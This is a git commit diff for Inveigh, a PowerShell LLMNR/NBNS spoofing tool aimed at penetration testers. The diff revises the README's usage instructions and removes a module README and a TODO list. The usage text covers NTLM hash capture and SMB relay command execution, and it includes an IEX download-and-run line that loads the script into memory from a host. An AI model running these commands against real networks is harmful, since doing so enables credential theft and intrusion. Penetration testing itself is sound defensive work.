diff options
| -rw-r--r-- | Inveigh.ps1 | bin | 173574 -> 94034 bytes | |||
| -rw-r--r-- | Invoke-Inveigh/Inveigh.psm1 | bin | 191774 -> 0 bytes | |||
| -rw-r--r-- | Invoke-Inveigh/README.md | 20 | ||||
| -rw-r--r-- | README.md | 53 | ||||
| -rw-r--r-- | TODO.md | 12 |
5 files changed, 45 insertions, 40 deletions
diff --git a/Inveigh.ps1 b/Inveigh.ps1 Binary files differindex 83deed0..2bab315 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 diff --git a/Invoke-Inveigh/Inveigh.psm1 b/Invoke-Inveigh/Inveigh.psm1 Binary files differdeleted file mode 100644 index 3671f47..0000000 --- a/Invoke-Inveigh/Inveigh.psm1 +++ /dev/null diff --git a/Invoke-Inveigh/README.md b/Invoke-Inveigh/README.md deleted file mode 100644 index 8fbce14..0000000 --- a/Invoke-Inveigh/README.md +++ /dev/null @@ -1,20 +0,0 @@ -# Inveigh.psm1 - -Module version of Inveigh. This has not been fully tested. - -# Usage: -Import-Module ./Inveigh.psm1 - -Execute Invoke-Inveigh with optional parameters - -Cmdlets: -Invoke-Inveigh - Start Inveigh with or without parameters. -Get-Inveigh - Display queued output. -Get-InveighLog - Display log entries. -Get-InveighNTLMv1 - Display captured NTLMv1 challenge/response hashes. -Get-InveighNTLMv2 - Display captured NTLMv2 challenge/response hashes. -Watch-Inveigh - Enable realtime console output. -Hide-Inveigh - Disable realtime console output. -Clear-Inveigh - Clear NTLMv1, NTLMv2, log, output, failed smbrelay, and spoof repeat suppression lists. -Stop-Inveigh - Stop Invoke-Inveigh. -Get-InveighHelp - List the cmdlets. @@ -1,8 +1,8 @@ # Inveigh -Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. +Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing standard post exploitation, phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions. # Requirements -Tested minimums are PowerShell 2.0 and .NET 3.5. +Tested minimums are PowerShell 2.0 and .NET 3.5 # Notes 1. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. @@ -17,19 +17,56 @@ Tested minimums are PowerShell 2.0 and .NET 3.5. 10. SMB relay support is experimental at this point, use caution if employing on a pen test. # Usage -Obtain an elevated administrator or SYSTEM shell. If necessary, use a method to bypass the PowerShell script execution policy. +Obtain an elevated administrator or SYSTEM shell. + +Use a method to load the module: + +To import with Import-Method: +Import-Module ./Inveigh.ps1 + +To import with dot source method: +. ./Inveigh.ps1 + +To load into memory using Invoke-Expression: +IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") To execute with default settings: -Inveigh.ps1 +Invoke-Inveigh + +To load and execute with one line: +Import-Module ./Inveigh.ps1;Invoke-Inveigh To execute with features enabled/disabled: -Inveigh.ps1 -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ForceWPADAuth Y/N -Output 0,1,2 -OutputDir 'valid folder path' +Invoke-Inveigh -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' To execute with SMB relay enabled: -Inveigh.ps1 -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" +Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" + +Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters + +# Cmdlets +Invoke-Inveigh - Start Inveigh with or without parameters +Get-Inveigh - Get queued console output +Get-InveighLog - Get log entries +Get-InveighNTLM - Get all captured challenge/response hashes +Get-InveighNTLMv1 - Get captured NTLMv1 challenge/response hashes +Get-InveighNTLMv2 - Get captured NTLMv2 challenge/response hashes +Get-InveighStats - Get captured challenge/response counts +Get-InveighHelp - List the cmdlets +Watch-Inveigh - Enable real time console output +Hide-Inveigh - Disable real time console output +Clear-Inveigh - Clear capture, log, smbrelay, and spoof lists +Stop-Inveigh - Stop Inveigh # Screenshots - +Invoke-Inveigh execution with real time console and file output enabled + + +Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2 + HTTP to SMB Relay - + + +Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive Powershell Session payloads + diff --git a/TODO.md b/TODO.md deleted file mode 100644 index 24d965b..0000000 --- a/TODO.md +++ /dev/null @@ -1,12 +0,0 @@ -## To Do -- [ ] Code cleanup! -- [x] Add NBNS spoofer -- [x] Add ability to capture NTLMv1 challenge/responses -- [ ] Add ability to capture LM challenge/responses -- [x] Add HTTP for challenge/response captures -- [x] Add HTTPS for challenge/response captures -- [x] Add Get-Help style comments -- [ ] Add SMB listener -- [ ] Add exfiltration method for captures -- [x] Add SMBRelay -- [ ] Add wpad.dat
\ No newline at end of file |